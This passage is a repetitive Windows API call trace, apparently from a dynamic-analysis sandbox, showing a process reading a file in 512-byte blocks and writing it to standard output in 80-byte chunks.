hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.306] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.306] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.306] GetFileType (hFile=0x50) returned 0x1 [0151.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x1 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.307] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.308] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.308] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.308] GetFileType (hFile=0x50) returned 0x1 [0151.308] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.309] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.309] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.309] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] GetFileType (hFile=0x50) returned 0x1 [0151.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.310] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.311] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.311] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.311] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.312] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.312] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.312] GetFileType (hFile=0x50) returned 0x1 [0151.312] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] GetFileType (hFile=0x50) returned 0x1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] GetFileType (hFile=0x50) returned 0x1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] GetFileType (hFile=0x50) returned 0x1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] GetFileType (hFile=0x50) returned 0x1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.314] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.314] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.315] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.315] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, 